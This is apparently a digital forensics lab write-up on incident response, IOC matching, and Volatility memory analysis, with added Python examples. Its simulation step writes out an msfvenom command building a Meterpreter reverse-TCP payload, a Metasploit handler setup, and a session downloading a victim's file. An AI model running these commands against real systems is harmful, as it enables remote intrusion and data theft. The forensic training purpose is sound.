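    "2023-03-08 20:08:50 edr host=WIN-V proc=malware3.exe sha256=" + "D2D2" + "0" * 60,
    "2023-03-08 20:09:01 dns client=10.0.0.9 query=mail.internal.example rcode=NOERROR",
]

def extract_indicators(line: str) -> Dict[str, Set[str]]:
    """Pull every IP, domain and SHA-256 candidate out of one log line (case-normalized)."""
    return {
        "ip": set(IP_RE.findall(line)),
        "domain": {d.lower() for d in DOMAIN_RE.findall(line)},
        "sha256": {h.lower() for h in SHA256_RE.findall(line)},
    }

def match_iocs(lines: List[str], iocs: Dict[str, Set[str]] = IOCS) -> List[dict]:
    """Return one hit per (line, indicator type, value) that is present in the IOC set."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        found = extract_indicators(line)
        for kind in ("ip", "domain", "sha256"):
            for value in sorted(found[kind] & iocs.get(kind, set())):
                hits.append({"line": line_no, "type": kind, "value": value})
    return hits

def summarize(hits: List[dict]) -> Dict[str, int]:
    """Count hits by indicator type, a quick triage view for the incident report."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["type"]] = counts.get(h["type"], 0) + 1
    return counts

if __name__ == "__main__":
    for hit in match_iocs(LOGS):
        print(f"line {hit['line']}: {hit['type']} {hit['value']}")
    print(summarize(match_iocs(LOGS)))
```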
· Determine the nature of the attack: Digital forensics experts can analyze the attack vectors used to gain access to the system, such as phishing emails, malware, or social engineering. This can help identify the type of attack and the motivations behind it.
· Collect and preserve evidence: Digital forensics experts must collect and preserve all relevant evidence related to the attack. This includes network logs, system files, emails, and any other data that may be relevant to the investigation.
· Analyze the evidence: Once the evidence is collected, digital forensics experts can analyze it to determine the extent of the attack. This may involve identifying the perpetrators, their methods, and the impact of the attack on the system.
· Report the findings: Digital forensics experts must report their findings to the relevant stakeholders, such as the company's management, IT staff, or law enforcement agencies. The report should include a detailed description of the extent of the attack, the damage caused, and recommendations for improving the security posture of the system.
By following these steps, digital forensics experts can determine the extent of an attack and provide recommendations for preventing future attacks.
There are various tools that can be used to collect, analyze, and manage indicators of compromise (IOCs) in a security environment. Here are some examples:
· Security Information and Event Management (SIEM) tools: SIEM tools, such as Splunk and IBM QRadar, can be used to collect and analyze log data from various sources, including network devices, servers, and applications. These tools can be configured to alert security teams when specific IOCs are detected, such as IP addresses, domain names, and file hashes.
· Endpoint Detection and Response (EDR) tools: EDR tools, such as Carbon Black and CrowdStrike, are designed to detect and respond to advanced threats on endpoints, including servers, workstations, and mobile devices. These tools can collect IOCs, such as file hashes and process names, from endpoints and use machine learning to identify and respond to suspicious activity.
· Threat Intelligence Platforms (TIPs): TIPs, such as ThreatConnect and Anomali, provide a centralized platform for managing and sharing IOCs across an organization. These tools can integrate with various security solutions, such as SIEM and EDR tools, to provide a comprehensive view of threats and enable faster incident response.
· Open Source Tools: There are various open source tools available for collecting and analyzing IOCs, including YARA, a pattern matching tool for malware analysis, and MISP (Malware Information Sharing Platform), a threat intelligence sharing platform.
YARA
YARA can be used for a wide range of malware-related tasks, including:
1. Malware analysis: YARA can be used to analyze and identify malware samples based on their attributes, such as file names, file sizes, file hashes, and strings within the code.
2. Threat intelligence: YARA can be used to create and share rules for specific malware families or threat actors to help other security professionals identify and respond to similar threats.
3. Incident response: YARA can be used to quickly identify malware on a compromised system and provide a starting point for further analysis and remediation.
Identify the source of the attack: By analyzing the
traffic, the digital forensics team can determine the source of the attack,
whether it was a single individual or a group of individuals working together.
Collect evidence: The team can collect evidence of the
attack, such as screenshots of suspicious traffic or log files, which can be
used in legal proceedings.
Remediate the attack: Once the attack has been
identified and evidence collected, the team can work with the IT department to
remediate the attack and prevent future attacks.
By performing network analysis, the digital forensics
team can identify the source of the attack, the extent of the attack, and
collect evidence that can be used in legal proceedings. Additionally, network
analysis can help prevent future attacks by identifying vulnerabilities in the
network that can be addressed.
Before starting the analysis we need to understand the traffic flow.
Tools: NetworkMiner, Wireshark
HowTo install NetworkMiner in Ubuntu Fedora and Arch Linux (netresec.com)
Save the traffic from Wireshark and open it in NetworkMiner.
· Determine the type of attack: Based on the traffic analysis,
Practical Malware Analysis Essentials for Incident Responders - YouTube
Scenario
Let's assume that machine A (the attacker) creates a payload and delivers it to machine V (the victim).
We need:
1. Preservation of Evidence
2. Determine that there is an attack using network analysis, and find machine A's IP
3. Analyze the attack to find the infected process, and analyze memory for further evidence
4. Document the findings
5. Presentation of Evidence
Solution:
1. Preservation of Evidence:
1.1 $ md5sum 6666.exe
1.2 Or: $ sha256sum 6666.exe
1.3 $ sha256sum WIN-9DOREUOSU7I-20230308-200844.raw
2. Collection of Evidence: Document the evidence: All evidence collected during the investigation should be properly documented, including where and when it was collected, who collected it, and any other relevant information.
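Added example, not the write-up's own procedure: steps 1 and 2 done together in Python, computing the same MD5 and SHA-256 values that md5sum and sha256sum print, recording who collected the item, from where and when in a manifest, and re-checking the hashes later so any change to the evidence is detected. The function names, the sample bytes, the collector name and the source label are constructed.

```python
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone
from typing import Dict, List

def hash_file(path: str) -> Dict[str, object]:
    """Compute MD5 and SHA-256 of a file in chunks (same values md5sum/sha256sum print)."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return {"md5": md5.hexdigest(), "sha256": sha256.hexdigest(), "size": os.path.getsize(path)}

def record_evidence(path: str, collected_by: str, source: str, manifest: List[dict]) -> dict:
    """Append a chain-of-custody entry: what, where it came from, who, when, and the hashes."""
    entry = {
        "file": os.path.basename(path),
        "source": source,  # hostname or image the item was taken from (constructed label)
        "collected_by": collected_by,
        "collected_at": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        **hash_file(path),
    }
    manifest.append(entry)
    return entry

def verify_evidence(path: str, entry: dict) -> bool:
    """Re-hash the file and compare with the recorded entry; False means it changed."""
    current = hash_file(path)
    return current["sha256"] == entry["sha256"] and current["md5"] == entry["md5"]

def save_manifest(manifest: List[dict], path: str) -> None:
    """Write the manifest as JSON so it can itself be hashed and stored with the evidence."""
    with open(path, "w", encoding="utf-8") as f:
        json.dump(manifest, f, indent=2)

def write_sample(content: bytes) -> str:
    """Write constructed sample bytes to a temporary file and return its path (demo only)."""
    fd, path = tempfile.mkstemp(prefix="evidence-")
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return path

if __name__ == "__main__":
    manifest: List[dict] = []
    sample = write_sample(b"constructed sample, not a real binary")
    entry = record_evidence(sample, "analyst-1", "machine V (constructed)", manifest)
    print(json.dumps(entry, indent=2))
```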
3. Analysis: We need to simulate the attack:
3.1 On machine A (Kali), create the payload using msfvenom:
sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.170.129 lport=5555 -f exe -o /var/www/html/test/malware3.exe
3.2 Start the Apache server: sudo service apache2 start
3.3 Wait for the victim to launch the payload malware3.exe (we can send it using social engineering or as an email attachment).
3.4 Launch Wireshark as an administrator, start capturing, and note the abnormal traffic to http://192.168.170.129/test/
3.5 Save the traffic to log.txt after opening malware.exe
3.6 Start Procmon and save the capture to log.csv // note the ProcDOT folder for more information
3.7 On machine A, Kali launches Metasploit:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.170.129
set lport 6666
exploit -j (or run)
session 1
    mkdir helooooo
    download cv.txt /home/kali
3.8 Stop Wireshark and Procmon
3.9 Export the packets to txt or pcap, and in Procmon save to log.csv
3.10 Open ProcDOT, add the log.txt or pcap and log.csv, select the launcher for the process we think is malicious, then refresh
3.11 Check the malware with VirusTotal
· We need first to extract the file from the memory dump:
$ vol.py -f /home/sansforensics/Desktop/WIN-9DOREUOSU7I-20230402-085644.raw --profile=Win8SP1x64_18340 psscan
The process ID: 3688
$ vol.py -f /home/sansforensics/Desktop/WIN-9DOREUOSU7I-20230402-085644.raw --profile=Win8SP1x64_18340 procdump -p 3688 --dump-dir=/home/sansforensics/Downloads/
Upload the dumped executable to VirusTotal.
Find whether any process is trying to hide:
$ vol.py -f /home/sansforensics/Desktop/WIN-9DOREUOSU7I-20230402-085644.raw --profile=Win8SP1x64_18340 psxview
4. Documentation of Findings
4.1 From here we found that the IP associated with the infected process 6666.exe is 192.168.170.129, which is machine A's IP.
4.2 Memory Analysis
1. Dump memory using DumpIt or another application and copy the file to a USB drive or a shared folder.
2. Open Ubuntu: $ vol.py -f /home/sansforensics/Desktop/cases/WIN-9DOREUOSU7I-20230308-200844.raw --profile=Win8SP1x64_18340 pstree
List network connections: $ vol.py -f /home/sansforensics/Desktop/cases/WIN-9DOREUOSU7I-20230308-200844.raw --profile=Win8SP1x64_18340 netscan
From the SYN_SENT flag we know there is a file transfer.
Registry analysis: $ vol.py -f /home/sansforensics/Desktop/cases/WIN-9DOREUOSU7I-20230308-200844.raw --profile=Win8SP1x64_18340 hivelist
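Added example, not from the write-up: parsing netscan output to find which process owns the connections to 192.168.170.129, which is the step 4.1 finding. The rows below are constructed (PID 3688 and owner 6666.exe come from the write-up, the victim address 192.168.170.130 is a placeholder), and the column layout is assumed from Volatility 2's netscan plugin.

```python
import re
from typing import List, Set, Tuple

# Column layout assumed from Volatility 2 netscan; the rows are constructed, with the
# PID/owner from the write-up and a placeholder victim address (192.168.170.130).
NETSCAN = """\
Offset(P)          Proto    Local Address                  Foreign Address      State            Pid      Owner          Created
0x7e0b4010         TCPv4    192.168.170.130:49160          192.168.170.129:6666 ESTABLISHED      3688     6666.exe       2023-03-08 20:07:51 UTC+0000
0x7e0c2a60         TCPv4    192.168.170.130:49161          192.168.170.129:80   CLOSED           3688     6666.exe       2023-03-08 20:07:40 UTC+0000
0x7e1e8b20         TCPv4    0.0.0.0:135                    0.0.0.0:0            LISTENING        804      svchost.exe    2023-03-08 19:55:02 UTC+0000
0x7e2f5d80         UDPv4    0.0.0.0:5355                   *:*                                   1084     svchost.exe    2023-03-08 19:55:10 UTC+0000
"""

# State is optional (UDP rows have none), so it is restricted to upper-case words
# to keep the regex from swallowing the PID column.
ROW_RE = re.compile(
    r"^(0x[0-9a-fA-F]+)\s+(TCPv[46]|UDPv[46])\s+(\S+)\s+(\S+)\s+([A-Z_]*)\s*(\d+)\s+(\S+)"
)

def split_addr(addr: str) -> Tuple[str, int]:
    """Split 'ip:port' (or '*:*') into (ip, port); port is -1 when unknown."""
    host, _, port = addr.rpartition(":")
    return host, int(port) if port.isdigit() else -1

def parse_netscan(text: str) -> List[dict]:
    """Parse netscan rows into dicts; the header and unparseable lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        _, proto, local, foreign, state, pid, owner = m.groups()
        lip, lport = split_addr(local)
        fip, fport = split_addr(foreign)
        rows.append({"proto": proto, "local_ip": lip, "local_port": lport, "foreign_ip": fip,
                     "foreign_port": fport, "state": state or "-", "pid": int(pid), "owner": owner})
    return rows

def connections_to(rows: List[dict], ip: str) -> List[dict]:
    """Every socket whose foreign address is the given IP (the attacker IP in the write-up)."""
    return [r for r in rows if r["foreign_ip"] == ip]

def owning_processes(rows: List[dict]) -> Set[Tuple[int, str]]:
    """(pid, owner) pairs to carry into procdump and psxview, as in the analysis step."""
    return {(r["pid"], r["owner"]) for r in rows}

if __name__ == "__main__":
    rows = parse_netscan(NETSCAN)
    hits = connections_to(rows, "192.168.170.129")
    for r in hits:
        print(f"{r['owner']} (pid {r['pid']}) -> {r['foreign_ip']}:{r['foreign_port']} {r['state']}")
    print("processes to dump:", owning_processes(hits))
```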
5. Presentation of Evidence